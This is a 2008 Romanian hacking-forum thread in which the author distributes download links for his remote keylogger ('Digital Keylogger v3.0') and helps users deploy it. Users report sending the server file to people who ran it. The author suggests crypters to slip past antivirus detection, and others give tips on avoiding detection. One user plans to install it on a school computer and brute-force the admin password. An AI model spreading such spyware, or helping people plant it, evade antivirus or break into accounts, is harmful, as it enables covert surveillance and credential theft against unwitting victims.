raul_onlly Posted March 14, 2008 Report Posted March 14, 2008 Nytro la mine nu merge sa il descarc.....imi zice ca nu gaseste site-u...il vrau si eu neaparat ...zimi de unde pot sa il descarc si eu...pls pls...ms mult:)
Nytro Posted March 14, 2008 Author Report Posted March 14, 2008 Download : http://rapidshare.com/files/87242715/Digital_Keylogger_v3.0_by_Nytro.rar http://www.speedyshare.com/617551467.html http://uploaded.to/?id=xlp2fi http://www.netdrive.ws/48170.htmlxeno13 :http://rstcenter.com/forum/rst-crearea-unui-trojan-keylogger-full-t10656.rst
raul_onlly Posted March 14, 2008 Report Posted March 14, 2008 Ms Nytro acu l-am descarcat...inca o mica problema...am trimis server-ul la cineva a dat clic pe el....dar eu cand ii bag ip-u si dai connect imi da cu eraore...dc????
raul_onlly Posted March 14, 2008 Report Posted March 14, 2008 Nytro vezi ca kaspersky il vede ca virus...l-am trimis eu la cineva si mi-a zis ca il vede ca trojan
georgex_hacker Posted March 14, 2008 Report Posted March 14, 2008 da nytro kaspersky il vede ca trojan !!!
Nytro Posted March 14, 2008 Author Report Posted March 14, 2008 Si ce sa fac sa nu il vada ? Sa sterg bucati din el ? Nu prea am ce face ... Incercati si voi un crypter ...
RealitySucks Posted March 18, 2008 Report Posted March 18, 2008 clientul nu functioneaza p pc-ul meu... e din cauza ca am nenorocitul de Vista instalat? imi da "file/path error" si nu i-am facut nik, doar l-am dezarhivat intr-un folder si atat...oare e o solutie daca mut folderul in cauza?L.E.: problema rezolvata, trebuia sa-i dau run as administrator... sunt varza pe Vista... (scuze ptr post-ul aiurea)
Nytro Posted March 19, 2008 Author Report Posted March 19, 2008 Nu-i nimic . Acea eroare o poti avea si daca nu ai Windows in C:\ , pentru ca mi-a fost lene sa caut folderul de system ...
Nytro Posted March 19, 2008 Author Report Posted March 19, 2008 E un API pentru gasirea folderului de sistem . Daca imi e lene fac cu windir , dar de exemplu daca e Windows NT , are folderul de system nu system32 .Environ("windir") va fi folderul Windows-ului , cred ca merge si %windir%
daatdraqq Posted March 20, 2008 Report Posted March 20, 2008 Bai fratilor nu mai scanati ma programele online ce draqq.Asa nu o sa facem nimic niciodata.Puneti si voi doua windows-uri pe un pc virtual ,puneti KIS pe unu NOD32 pe celalalt si le scanati cu astea....Nu mai scanati online va rog frumos ca ne furam singuri palaria !!!
shelu Posted March 25, 2008 Report Posted March 25, 2008 Sal Nytro, felicitari pt program!Te rog spune-mi si mie ce trebuie sa modific, ca sa mearga pe Windows NT, pt ca da eroare "path not found".Inca ceva....Vreau sa instalez serverul pe un pc care nu are acces la administrator.. se poate?Folosesc V3.0.
Nytro Posted March 25, 2008 Author Report Posted March 25, 2008 Din cauza scanatului online devin toate detectabile .shelu , nu ai folderul de sistem C:\WINDOWS\system32 nu ? Din cauza mea e acea eroare ... Mi-a fost lene sa cuat folderul de sistem si am scris direct C:\WINDOWS\system32 . Sau nu ai drept de admin .
shelu Posted March 25, 2008 Report Posted March 25, 2008 Nytro, pe pc'u de la scoala e si Windows NT si nici nu am acces la admin. Si acolo vreau sa folosesc programul. Cred ca folderul e system nu system32 in Windows NT.Pot sa fac ceva pe pc'u ala ? Cu parola la admin cred ca m-as descurca, as folosi un brute force... Ms!
Nytro Posted March 25, 2008 Author Report Posted March 25, 2008 Nu pot face nimic daca nu esti admin . Si clientul si serverul copiaza automat un fisier ( mswinsck.ocx ) in system folder . Fara acel fisier nu poate rula programul . Dar mi-ai dat o idee foarte buna : local keylogger . Cand am timp voi face asa ceva
shelu Posted March 25, 2008 Report Posted March 25, 2008 Ok, ms pt ajutor, o sa incerc sa obtin parola la admin; bucuros ca ti-am dat o idee buna , astept sa vad cum faci programul.
Nytro Posted March 25, 2008 Author Report Posted March 25, 2008 Cp si ms pentru idee , vreau sa fac si un keylogger pentru Vista dar nu stau deloc bine cu timpul
shelu Posted March 27, 2008 Report Posted March 27, 2008 Nytro inca ceva. Vreau sa folosesc programul pe cineva care IP de genul 192.168.x.x. Sa zicem ca ii cer IP si mi-l da, pot sa ma contactez la el folosind acest IP? Daca nu, atunci pot sa ma conectez la el in alt mod ?Stiu ca e o intrebare de noob, dar nu stiu mai nimic legat de IP-uri de genul asta!
Nytro Posted March 27, 2008 Author Report Posted March 27, 2008 Trebuie sa ruleze serverul acea persoana , apoi te conectezi din client la acel IP .
shelu Posted March 27, 2008 Report Posted March 27, 2008 Ms mult pt ajutor! Stiu ca asa se face, dar nu stiam daca merge pt IP de genul 192.168.x.x (de ex IP'urile astea nu le vezi daca dai netstat, sau daca primesti un mail de la el), si am zis ca sunt mai 'deosebite', si nu merge nici keyloggerul pe ele.
winxp Posted April 26, 2008 Report Posted April 26, 2008 E de pe net, pentru problema cu directorul system.'--> CODE FOR THE MODULE, TO GET THE WINDOWS SYSTEM DIRECTORY -START-Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As LongPublic Const MAX_PATH = 260'--> CODE FOR THE MODULE, TO GET THE WINDOWS SYSTEM DIRECTORY -END-'--> CODE FOR THE FORM TO LOAD THE PATH OF THE SYSTEM DIR INTO A STRING -START-Public Function GetSystemPath()Dim strFolder As StringDim lngResult As LongstrFolder = String(MAX_PATH, 0)lngResult = GetSystemDirectory(strFolder, MAX_PATH)If lngResult <> 0 Then GetSystemPath = Left(strFolder, InStr(strFolder, _ Chr(0)) - 1)Else GetSystemPath = ""End IfEnd Function'--> CODE FOR THE FORM TO LOAD THE PATH OF THE SYSTEM DIR INTO A STRING -END-
Nytro Posted May 4, 2008 Author Report Posted May 4, 2008 Imi ajung 2 randuri sa iau folderul de sistem , oricum ms